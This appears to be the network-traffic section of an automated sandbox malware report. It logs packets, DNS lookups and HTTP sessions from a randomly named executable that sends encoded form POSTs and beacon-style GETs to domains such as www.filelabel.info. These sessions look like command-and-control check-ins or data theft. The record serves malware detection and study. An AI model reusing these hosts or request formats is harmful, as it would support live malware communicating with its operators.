                                                                                                                                                            Nov 12, 2024 18:36:12.538383961 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.538419008 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.539938927 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.540026903 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.654593945 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.654633045 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.654644966 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.654674053 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.656656981 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.656668901 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.656685114 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.656697035 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.656703949 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.656712055 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.656738043 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.656759024 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:13.121701956 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.142062902 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.147491932 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.147578001 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.161725044 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.167515993 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.171435118 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.833102942 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.833211899 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.833225012 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.833492041 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.833734989 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.833749056 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.833769083 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.834096909 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.834657907 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.834673882 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.834686041 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.834784985 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.835717916 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.838603973 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.838972092 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.839103937 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.953073025 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.953092098 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.953110933 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.953264952 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.953550100 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.953562975 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.954051018 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.954063892 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.954077005 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.954155922 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.954155922 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.954909086 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.954921961 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.955018044 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:14.955445051 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.955457926 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:14.955858946 CET5001480192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:15.071424961 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:15.071579933 CET805001452.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:39.889698029 CET5375680192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:39.898668051 CET5375680192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:39.904490948 CET8053756142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:40.875412941 CET8053756142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:40.918664932 CET5375680192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:40.996145964 CET8053756142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:40.996216059 CET5375680192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:41.403179884 CET5375680192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:42.425757885 CET5375780192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:42.430792093 CET8053757142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:42.434464931 CET5375780192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:42.445817947 CET5375780192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:42.450826883 CET8053757142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:42.450956106 CET8053757142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:43.443495989 CET8053757142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:43.487335920 CET5375780192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:43.575160980 CET8053757142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:43.575216055 CET5375780192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:43.951575994 CET5375780192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:44.969753027 CET5375880192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:44.975946903 CET8053758142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:44.976026058 CET5375880192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:44.985394001 CET5375880192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:44.992042065 CET8053758142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:45.914990902 CET8053758142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:45.965548038 CET5375880192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:46.035090923 CET8053758142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:46.037955999 CET5375880192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:46.039068937 CET5375880192.168.2.8142.250.185.179
                                                                                                                                                            Nov 12, 2024 18:36:46.043844938 CET8053758142.250.185.179192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:51.118037939 CET5375980192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:51.123123884 CET8053759172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:51.123692036 CET5375980192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:51.174268007 CET5375980192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:51.179338932 CET8053759172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:52.687625885 CET5375980192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:52.735912085 CET8053759172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:53.768682003 CET5376080192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:53.773752928 CET8053760172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:53.773855925 CET5376080192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:53.786096096 CET5376080192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:53.792047977 CET8053760172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:55.293840885 CET5376080192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:55.344079018 CET8053760172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:56.315823078 CET5376180192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:56.320751905 CET8053761172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:56.321108103 CET5376180192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:56.335053921 CET5376180192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:56.340128899 CET8053761172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:56.340953112 CET8053761172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:57.840790033 CET5376180192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:57.891838074 CET8053761172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:58.885652065 CET5376280192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:58.890697956 CET8053762172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:58.890763044 CET5376280192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:58.900525093 CET5376280192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:36:58.905374050 CET8053762172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:59.604793072 CET8053759172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:59.604852915 CET5375980192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:37:02.249573946 CET8053760172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:02.249644041 CET5376080192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:37:04.805882931 CET8053761172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:04.805932999 CET5376180192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:37:07.373656988 CET8053762172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:07.373756886 CET5376280192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:37:07.374953985 CET5376280192.168.2.8172.81.61.224
                                                                                                                                                            Nov 12, 2024 18:37:07.381144047 CET8053762172.81.61.224192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:12.407727957 CET5376380192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:12.412792921 CET80537633.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:12.412879944 CET5376380192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:12.427748919 CET5376380192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:12.432847977 CET80537633.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:13.050801039 CET80537633.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:13.050868988 CET5376380192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:13.934566021 CET5376380192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:13.939519882 CET80537633.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:14.954058886 CET5376480192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:14.959243059 CET80537643.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:14.959340096 CET5376480192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:14.973520994 CET5376480192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:14.978573084 CET80537643.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:15.611326933 CET80537643.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:15.611386061 CET5376480192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:16.481422901 CET5376480192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:16.486403942 CET80537643.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:17.504029989 CET5376580192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:17.509262085 CET80537653.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:17.509344101 CET5376580192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:17.524045944 CET5376580192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:17.530363083 CET80537653.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:17.530379057 CET80537653.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:18.161917925 CET80537653.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:18.163806915 CET5376580192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:20.903378010 CET5376580192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:20.910978079 CET80537653.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:21.922252893 CET5376680192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:21.927752018 CET80537663.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:21.929898977 CET5376680192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:21.937359095 CET5376680192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:21.942604065 CET80537663.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:22.562114954 CET80537663.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:22.562903881 CET80537663.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:22.563162088 CET5376680192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:22.565264940 CET5376680192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:22.570579052 CET80537663.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:30.668354988 CET5376780192.168.2.835.156.117.131
                                                                                                                                                            Nov 12, 2024 18:37:30.673464060 CET805376735.156.117.131192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:30.673580885 CET5376780192.168.2.835.156.117.131
                                                                                                                                                            Nov 12, 2024 18:37:30.681700945 CET5376780192.168.2.835.156.117.131
                                                                                                                                                            Nov 12, 2024 18:37:30.686861038 CET805376735.156.117.131192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:32.004672050 CET805376735.156.117.131192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:32.004693031 CET805376735.156.117.131192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:32.004900932 CET5376780192.168.2.835.156.117.131
                                                                                                                                                            Nov 12, 2024 18:37:32.126744986 CET805376735.156.117.131192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:32.126898050 CET5376780192.168.2.835.156.117.131
                                                                                                                                                            Nov 12, 2024 18:37:32.127989054 CET5376780192.168.2.835.156.117.131
                                                                                                                                                            Nov 12, 2024 18:37:32.132921934 CET805376735.156.117.131192.168.2.8
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                            Nov 12, 2024 18:36:37.323757887 CET53525381.1.1.1192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:51.069952965 CET5349753192.168.2.81.1.1.1
                                                                                                                                                            Nov 12, 2024 18:36:51.109863997 CET53534971.1.1.1192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:12.391218901 CET6289253192.168.2.81.1.1.1
                                                                                                                                                            Nov 12, 2024 18:37:12.403470993 CET53628921.1.1.1192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49713 | 35.156.117.131 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:33:42.722141027 CET | 541 | OUT | GET /s7e8/?TTd=yRNPZBU8fZA&mnYxMt=Qf5nKOHOS6pOo2hrLtSm+ampCv+PHNIpbdUHnCIedAl2mvk/ZCfVPn7bYBvLSFyKndMpVE3F/mLSkI4cHOWneDowc/gh6rYJzY7Er9+/8bJZT8eqOHKV6gTsddlCzKVbHQ== HTTP/1.1
                                                                                                                                                            Host: www.specialgift.asia
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Nov 12, 2024 18:33:43.955867052 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:33:43 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Content-Length: 2088
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Status: 404 Not Found
                                                                                                                                                            X-Request-Id: 618a2981cf5a603a1e340252859201b1
                                                                                                                                                            X-Runtime: 0.014474
                                                                                                                                                            Data Ascii: <html> <head> <title>Page not found - Strikingly</title> <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" /> <link href='https://fonts.googleapis.com/css?family=Montserrat|Open+Sans' rel='stylesheet' type='text/css'> <link href='//assets.strikingly.com/assets/404-styles.css' rel='stylesheet' type='text/css'> ...[if lte IE 7]> <style> .wide { padding-top: 160px; } </style> <![endif]--> <script type="text/javascript"> // Google Analytics (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-25124444-6', 'auto'); ga('set', 'anonymizeIp
Nov 12, 2024 18:33:43.955899954 CET | 212 | IN
                                                                                                                                                            Data Ascii: ', true); ga('send', 'pageview', { 'anonymizeIp': true }); // End Google Analytics </script> </head> <body> <div class='bg-logo'></div> <div class='wide light-text'> <div class='co
Nov 12, 2024 18:33:43.956121922 CET | 918 | IN
                                                                                                                                                            Data Ascii: l2'> <h1> PAGE NOT FOUND.</h1> <p>But if you're looking to build your own website, <br/>you've come to the right place.</p> <p class="buttons"> <a class='button dark-bg' href='https://www.strikingly.com/?utm_s


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49714 | 3.33.130.190 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:33:59.423479080 CET | 800 | OUT | POST /lclg/ HTTP/1.1
                                                                                                                                                            Host: www.filelabel.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.filelabel.info
                                                                                                                                                            Referer: http://www.filelabel.info/lclg/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=nElwp91d2c4kZ/r20kLoWRLmz7KLlfGihlpWoxgZWMvwgzm89fGuQoQfrriMsJQEFlXzEeChFlZH7c75uMHL8F0uDnAsOufKffrmWbwaJPpwjEaUXRgt0nZ9sQYFXNSOHAvV95lbBrFwfMPytqwPN17w7QkIgIsV+RiE3gn7DPQrNyOOJzuozb0zT8x2IgwuvXP5YVI=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49715 | 3.33.130.190 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:34:02.023849010 CET820OUTPOST /lclg/ HTTP/1.1
                                                                                                                                                            Host: www.filelabel.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.filelabel.info
                                                                                                                                                            Referer: http://www.filelabel.info/lclg/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=nElwp91d2c4kZcj2y3ToBhLl27KLv/GmhllWowVCW+7whRu8+eGuFoQfhLiJzZQNFlaTEbihFlNH7dL5udHI9V0WIHAqDOfKffrmWaUwJPxwj0KUFzYq9HZ+rQYFTNSKHAvn94p9Bo9wfOXyt+kME1720wlvvYpjzRm9ySXGMu8gMEjkTRmuwbcYT/ZANXtG10fJGCdoT/5w1d0rbfJHpfSX4M25


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49716 | 3.33.130.190 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:34:04.581762075 CET | 1837 | OUT | POST /lclg/ HTTP/1.1
                                                                                                                                                            Host: www.filelabel.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.filelabel.info
                                                                                                                                                            Referer: http://www.filelabel.info/lclg/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Data Ascii: mnYxMt= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49717 | 3.33.130.190 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:34:07.121895075 CET | 539 | OUT | GET /lclg/?mnYxMt=qGNQqN428OgBR9iLlEb4WGf8+MyTqJq+i1J9pxVfZ8K+uwmr88+1atpMra6tnIlLOjS5I+7feEtfi/Omwv/rkFANGX4pZoX9Su7sNqFMId0FgDeuDTQ2y3FSwAk0Ntj9dQ==&TTd=yRNPZBU8fZA HTTP/1.1
                                                                                                                                                            Host: www.filelabel.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Nov 12, 2024 18:34:07.739193916 CET | 410 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:07 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 270
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mnYxMt=qGNQqN428OgBR9iLlEb4WGf8+MyTqJq+i1J9pxVfZ8K+uwmr88+1atpMra6tnIlLOjS5I+7feEtfi/Omwv/rkFANGX4pZoX9Su7sNqFMId0FgDeuDTQ2y3FSwAk0Ntj9dQ==&TTd=yRNPZBU8fZA"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49719 | 3.33.130.190 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:34:21.022697926 CET | 824 | OUT | POST /ou1g/ HTTP/1.1
                                                                                                                                                            Host: www.multileveltravel.world
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.multileveltravel.world
                                                                                                                                                            Referer: http://www.multileveltravel.world/ou1g/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=k4neGU5Lr/HE+dQopJJgYsmvPVbCb8gNS5Ix/s2Y2l711X+mOrehaXUfhGlgxt4WEAEyNbcBsfnosbAHr5Y7sDqdXErihYEzCuE4QMv6b0bh2D+Vymyw9yhzmLUmGFhfrUgxuXAin6Ox4MRBlRsGVomYaTsPThEq2SxY9ViLLKY8M25nZoXV2UwFk2md9vEd2Sf5bmE=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49720 | 3.33.130.190 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
